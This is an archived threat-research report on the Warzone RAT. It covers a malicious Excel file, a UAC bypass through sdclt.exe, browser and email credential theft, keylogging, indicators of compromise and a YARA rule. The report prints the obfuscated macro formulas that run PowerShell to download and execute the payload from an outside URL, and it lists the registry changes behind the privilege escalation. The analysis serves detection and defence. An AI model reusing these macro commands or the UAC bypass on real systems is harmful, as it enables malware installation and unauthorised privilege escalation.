{
	"id": "0588b57d-45dc-4638-a098-ff18cd9fb37c",
	"created_at": "2026-04-06T00:08:42.516316Z",
	"updated_at": "2026-04-10T13:12:46.816505Z",
	"deleted_at": null,
	"sha1_hash": "ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6",
	"title": "Warzone RAT Comes With UAC Bypass Technique",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1572021,
	"plain_text": "Warzone RAT Comes With UAC Bypass Technique\r\nBy Abhijit Mohanta\r\nPublished: 2020-11-25 · Archived: 2026-04-05 15:57:45 UTC\r\nUptycs' threat research team identified an XLS document that downloaded a highly vicious payload named Warzone RAT. The payload, also known as “Ave Maria stealer,” can steal credentials and log keystrokes on the victim’s machine. Checkpoint mentioned Warzone early this year when the malware was in its early stage of development.\r\nThe latest version of the malware is fully developed and is being sold in the underground market. The Warzone authors have an official website where cybercriminals can buy the malware.\r\nThe site lists various features of the RAT and the pricing (the RAT can be rented for $22.95 per month and $49.95 for three months).\r\nhttps://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique\r\nPage 1 of 13\n\nFigure 1: Warzone RAT official website.\r\nThe Warzone developers rent out several products on their website:\r\nRAT\r\nRAT Poison\r\nCrypter\r\nSILENT.doc exploit\r\nSILENT EXCEL Exploit\r\nHere are various features of the RAT noted on the website:\r\nNative, independent stub\r\nRemote Desktop\r\nHidden Remote Desktop - HRDP\r\nPrivilege Escalation - UAC Bypass\r\nRemote WebCam\r\nPassword Recovery\r\nFile Manager\r\nDownload \u0026 Execute\r\nLive Keylogger\r\nOffline Keylogger\r\nRemote Shell\r\nProcess Manager\r\nReverse Proxy\r\nAutomatic Tasks\r\nMass Execute\r\nSmart Updater\r\nHRDP WAN Direct Connection\r\nPersistence\r\nWindows Defender Bypass\r\nWe also discovered a cracked version of Warzone hosted on GitHub. Here’s a screenshot of the repo:\r\nFigure 2: A cracked version of Warzone on GitHub.\r\nThe instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we’re going to talk about the XLS used as the attack vector and the UAC bypass technique used.\r\nThe Malicious XLS\r\nThe XLS used in the attack uses Excel 4.0 Macro, also known as XLM Macro. The XLM Macro feature has been part of Microsoft Excel for a long time, but we’ve seen a spike in its malicious usage for a few months now. Malware authors exploit this feature of Excel, which allows formulas to be written using macros.\r\nWhen we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on VirusTotal (see figure 3).\r\nFigure 3: Detections on VirusTotal.\r\nIn the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible if the XLS is opened. The macros are visible only after unhiding the sheet. The following screenshot shows the unhidden sheet with macro code embedded in the formula.\r\nFigure 4: Macro in unhidden sheet.\r\nHere’s the macro code in the respective rows and columns:\r\nRow 596 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile').\"\"\"\"Invoke\"\"\"\"('https://cutt.ly/agJgRCy','gm.exe')\"\r\nRow 597 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1\r\nstARt`-slE`Ep 20; Move-Item \"\"gm.exe\"\" -Destination \"\"${enV`:appdata}\"\"\"\r\nRow 598 column E -\r\n=CHAR(99)\u0026CHAR(109)\u0026CHAR(100)\u0026CHAR(32)\u0026CHAR(47)\u0026CHAR(99)\u0026\"powe^rshell -w 1\r\nstARt`-slE`Ep 25; cd ${enV`:appdata}; ./gm.exe\"\r\nThese macros are responsible for downloading and executing the Warzone RAT. The Warzone payload takes full control of the system after bypassing UAC and then steals information and monitors the victim’s machine.\r\nHere’s the flow of the attack:\r\nThe macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT\r\nGm.exe bypasses UAC to run at high integrity level\r\nGm.exe copies itself to %programdata% with the name Images.exe and then executes it. Images.exe runs at high integrity level\r\nThe image below describes the flow of the attack.\r\nFigure 5: The flow of attack.\r\nThe Warzone RAT Payload: Win Over the UAC\r\nThe Warzone RAT (gm.exe) is a 32-bit application and uses sdclt.exe to bypass UAC and run at higher privileges. Sdclt.exe is a built-in Windows utility used for backup and restore purposes. Sdclt is designed to auto-elevate its privilege and uses the control panel binary, control.exe, to back up and restore control panel settings.\r\nThere are many UAC bypass techniques that are not effective on Windows 10 because of the default file system restrictions. A 32-bit application can’t access the native c:\\windows\\system32 directory because the operating system redirects the request to c:\\windows\\SysWOW64. Sdclt.exe and other UAC bypass binaries are 64-bit applications and are not available in the SysWOW64 directory.\r\nHowever, the operating system provides a mechanism to disable the file system redirection using the Wow64DisableWow64FsRedirection API. So Warzone uses the Wow64DisableWow64FsRedirection API to disable the file system redirection and access the sdclt.exe that resides in the system32 directory (see figure 6, below).\r\nFigure 6: The call to the Wow64DisableWow64FsRedirection API disables file system redirection for a 32-bit application.\r\nAfter disabling the redirection, the malware makes the following registry changes:\r\nCreates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command\r\nSets the “Default” value to “path of the malware”\r\nCreates a value “DelegateExecute” and sets the value to “0”\r\nExecutes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7)\r\nFigure 7: The malware sets registry keys and calls sdclt.exe to bypass UAC.\r\nThis step elevates the privilege of the malicious process and executes it at high integrity as shown in the image below (figure 8).\r\nFigure 8: Images.exe runs at a higher integrity level.\r\nThe Warzone RAT can steal passwords from the following browsers:\r\nGoogle Chrome\r\nEpic Privacy Browser\r\nMicrosoft Edge\r\nOpera\r\nTencent QQ Browser\r\nBrave Browser\r\nCenterBrowser\r\nBlisk\r\nTorch Browser\r\nSlimjet browser\r\nIt steals the passwords that are stored in the browser databases. The following screenshot (figure 9) shows the query used to extract saved credentials in the browser.\r\nFigure 9: RAT stealing passwords from the browser.\r\nThe Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10).\r\nFigure 10: RAT stealing passwords from email clients.\r\nThe RAT also has a keylogger component that uses the GetAsyncKeyState Windows API to log keystrokes (see figure 11).\r\nFigure 11: Keylogger code using the GetAsyncKeyState API.\r\nThe following screenshot (figure 12) shows the part of the keylogger code that handles the logging of special keys: TAB, BKSP, ESC, CAPS, CTRL, etc.\r\nFigure 12: Keylogger code to handle special keys.\r\nHere are some more strings that can be used to identify and detect the unpacked Warzone payload in memory:\r\nwarzone160\r\nAve_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper\r\nC:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe\r\nUptycs EDR Detection\r\nFigure 13: Uptycs alerts.\r\nFigure 14: Uptycs process graph.\r\nMalware authors are always hunting for techniques that can bypass security. As mentioned earlier, the UAC bypass technique used by Warzone works on the latest version of Windows 10.\r\nWe are seeing an increase in usage of the technique. In our intelligence database we have encountered some additional malware that uses the same technique to bypass UAC. Below is a screenshot (figure 15) of VBA macro code found in an .xlsm sample (SHA256: 70d400cbacc02f2417e742608c626c52698b07a42de3eb6e1ff4fea17d5bc0b6) using the API.\r\nFigure 15: VBA macro using the Wow64DisableWow64FsRedirection API.\r\nIndicators of Compromise\r\nSHA256\r\nXLS - 401634497f93067541d5d5a7d7511f7486684b2076034f8d5b205a274750e90b\r\nWarZone RAT - 55ff46cb70e9b4a326776e45a540e48166d04463c4f91de117528e487ce62b2c\r\nFiles Dropped\r\n%AppData%gm.exe\r\n%ProgramData%Images.exe\r\nRegistry Changes\r\n1. Key: HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue: Images data: %programdata%images.exe\r\n2. Key: HKCU\\Software\\Classes\\Folder\\shell\\open\\command\r\nValue: Default data: %appdata%gm.exe\r\nValue: DelegateExecute data: 0\r\nURLs\r\nhxxps://cutt.ly/agJgRCy/gm.exe\r\nYARA Rule\r\nrule Warzone_RAT {\r\n meta:\r\n description = \"warzone RAT -Memory\"\r\n author = \"abhijit mohanta\"\r\n date = \"15 Oct 2020\"\r\n strings:\r\n $Warzone0 = \"warzone160\" ascii wide nocase\r\n $Warzone1 = \"[ENTER]\" ascii wide nocase\r\n $Warzone2 = \"[BKSP]\" ascii wide nocase\r\n $Warzone3 = \"[TAB]\" ascii wide nocase\r\n $Warzone4 = \"[CTRL]\" ascii wide nocase\r\n $Warzone5 = \"[ALT]\" ascii wide nocase\r\n $Warzone6 = \"[CAPS]\" ascii wide nocase\r\n $Warzone7 = \"[ESC]\" ascii wide nocase\r\n $Warzone8 = \"[INSERT]\" ascii wide nocase\r\n condition:\r\n all of ($Warzone*)\r\n}\r\nThanks to Shilpesh Trivedi and the rest of the Uptycs threat research team for their contributions.\r\nSource: https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique"
	],
	"report_names": [
		"warzone-rat-comes-with-uac-bypass-technique"
	],
	"threat_actors": [],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775826766,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.pdf",
		"text": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.txt",
		"img": "https://archive.orkl.eu/ef2c91f5055a015a5ecfb7c8b02e84fe0e35b9f6.jpg"
	}
}